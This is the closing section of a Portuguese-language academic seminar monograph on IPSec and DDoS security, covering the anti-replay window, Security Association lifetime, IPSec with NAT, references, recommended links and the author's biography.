COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
A janela do IPSec do tipo janela-deslizante e seu tamanho default 64 bits. Conforme explicado na RFC2401 ( pgina14 ), o servio de Anti-replay tem o seguinte funcionamento :
A janela possui um limite superior e inferior ; Ao receber um pacote, se seu Sequence Number tiver valor menor que o limite inferior da janela, ele descartado ; Pacotes que possuam Sequence Number localizado dentro da janela so checados contra uma lista de pacotes recebidos anteriormente, caso exista na lista ser rejeitado, do contrrio este sequence number ser marcado como recebido; Pacotes que possuam Sequence Number localizado na direita da janela fazem com que ela avance , modificando seus limiares. No livro do Stallings ( pag 410) , ele faz a seguinte referncia: Como o IP um servio sem conexo e no confivel (best-effort) , no existe a garantia de que todos os pacotes sero entregues.
71
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
No meu entender isto explica o motivo da janela caminhar para a direita sem preocupar-se com os pacotes que no chegaram pelo limite inferior ( eles sero reenviados ). 3) Durao de uma SA implementando uma VPN
Toda SA possui um tempo de vida til limitado pelo nmero mximo do Sequence Number. Ao atingir este limite, uma nova SA deve ser criada para no haver duplicidade no nmero de sequncia de um pacote. Isto tambm vale para uma VPN.
4) IPSec e NAT
Conforme coloquei durante a apresentao, existe uma RFC sobre o assunto. A RFC a de nmero 2709, recomendo sua leitura para aqueles mais interessados no assunto. Aps rpida leitura pode-se concluir que possvel fazer NAT com IPSec. Eles chamam esta soluo de IPC-NAT ( IPSec Controller NAT) . O IPC_NAT somente suportado em modo tnel.
72
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
REFERNCIAS
Livros, Papers e RFCs [ 1 ] Andrew S. Tanenbaum, Computer Networks, Prentice Hall, 1996, 3 edio, Cap 7.1 [2] William Stallings, Criptography and Network Security: Principles and Practice, Prentice Hall, 1999, 2 edio, Cap 13 [3] Alfred J. Menezaes, Paul C. Van Oorschot e Scott A Vanstone, Handbook of Applied Cryptography, CRC Press, 1999, 4 edio [4] B. Fraser, Site Security Handbook, RFC2196, Set 1997 [5] S. Kent e R. Atkinson, Security Architecture for the Internet Protocol, RFC2401, Nov 1998 [6] S. Kent e R. Atkinson, IP Authentication Header, RFC2402, Nov 1998 [7] S. Kent e R. Atkinson, IP Encapsulating Security Payload, RFC2406, Nov 1998 [8] D. Piper, The Internet IP Security Domain of Interpretation for ISAKMP, RFC2407, Nov 1998 [9] D. Maughan, M. Schertler, M. Schneider, J. Turner, Internet Security Association and Key Management Protocol (ISAKMP), RFC2408, Nov 1998 [10] D. Harkins e D. Carrel, The Internet Key Exchange ( IKE ), RFC2409, Nov 1998 [11] R. Thayer, N. Doraswamy, R. Glenn, IP Security Document Roadmap, RFC2411, Nov 1998 [12] H. Orman, The OAKLEY Key Determination Protocol, RFC2412, Nov 1998 [13] P. Metzger, W. Simpson, IP Authentication using Keyed MD5, RFC1828, Aug 1995 [14] H. Krawczyk, M. Bellare, R. Canetti, HMAC: Keyed-Hashing for Message Authentication, RFC2104, Fev 1997 [15] M. Oehler e R. Glenn, HMAC-MD5 IP Authentication with Replay Prevention, RFC2085, Fev 1997
73
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
[16] P. Karn, P. Metzger, W. Simpson, The ESP-DES CBC Transform, RFC1829, Aug 1995 [17] R. Pereira e R. Adams, The ESP CBC- Mode Cipher Algorithms, RFC2451, Nov 1998 [18] C. Madson e N. Doraswamy, The ESP DES-CBC Cipher algorithm With Explicit IV, RFC2405, Nov 1998 [19] C. Madson e R. Glenn, The Use of HMAC-MD5-96 within ESP e AH, RFC2403, Nov 1998 [20] C. Madson e R. Glenn, The Use of HMAC-SHA-1-96 within EP e AH, RFC2404, Nov 1998 [21] A. Keromitz e N.Provos, The Use of HMAC-RIPEMD-160-96 within ESP e AH, RFC2857, Jun 2000 [22] R. Glenn e S. Kent, The Null encryption Algorithm and its use with IPSec, RFC2410, Nov 1998 [23] Dave Kosiur, Building and Managing Virtual Private Networks, Wiley, 1998, 1 edio [24] Michael Borella, Methods and Protocols for Secure Key Negotiation Using IKE, IEEE Networks, Aug 2000 [25] Neils Ferguson e Bruce schineir, A Criptografic Evaluation of IPSec, www.couterpane.com, Jan 2000 [26] Joan Allard e Svante Nygren, IPSec Interoperability, Data Communications International, Jun 1999 [27] Annimo, Segurana Mxima, Campus, 1998, 2 edio [28] CIAC, Distributed denial of Service, http://ciac.llnl.gov/ciac/documents/CIAC_2319_Distributed_Denial_of_Serv ice.pdf, Fev 1999 [29] David Dittrich, The DoS project trinoo distributed denial of service attack tool, http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Out 1999 [30] Alcatel, Understanding the IPSec protocol suite, http://www.timestep.com/doctypes/technewbridgenote/pdf/ipsec_nn.pdf, Mar 2000
74
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
10 LINKS INDICADOS
[1] IETF ( Internet Engineering Task Force ) http://www.ietf.org [2] CERT ( Computer Emergence Response Team ) http://www.cert.org [3] Cisco Systems http://www.cisco.com/warp/public/707/advisory.html [4] Checkpoint Home Page http://www.checkpoint.com [5] Ronald Rivest Home Page http://theory.lcs.mit.edu/~rivest/crypto-security.html [6] Dave Dittrich Home Page http://staff.washington.edu/dittrich [7] DDoS Page http://www.denialinfo.com [8] IPSec Developers Forum www.ip-sec.com [9] Virtual Private Network Consortion www.vpnc.org [10] International Computer Security Association www.icsa.net [11] Dave Dittrich DDoS Home Page http://staff.washington.edu/dittrich/misc/ddos [12] USSR Home Page http://ussrback.com/files.html [13] SANS Home Page www.sans.org [14] NIPC Home page www.nipc.gov [15] RID Home Page http://www.theorygroup.com/Software/RID [16] Find_DDoS http://packetstorm.security.com/distributed
75
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
11 TRABALHO PRTICO
A proposta para trabalho prtico do seminrio a realizao de um teste de conformidade do IPSec executando num equipamento cisco 2600 ( IPSec IOS 12.0 ). A realizao do teste est agendada para a semana de 08/12/01 at 15/12/01.
76
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
12 O AUTOR
Ismael Da Silva Mariano Engenheiro Eletrnico graduado pela Universidade Santa rsula em Dez/86, Analista de Sistemas com curso de especializao Latusensu pelo CCE/PUC-RJ em Nov/1998 e atualmente cursa o mestrado na linha de pesquisa redes de computadores na COPPE_RJ. Possui 13 anos de experincia profissional na rea de suporte a sistemas operacionais e redes de computadores. Seus interesses de pesquisa esto na rea de segurana em redes TCP/IP e roteamento na INTERNET.
77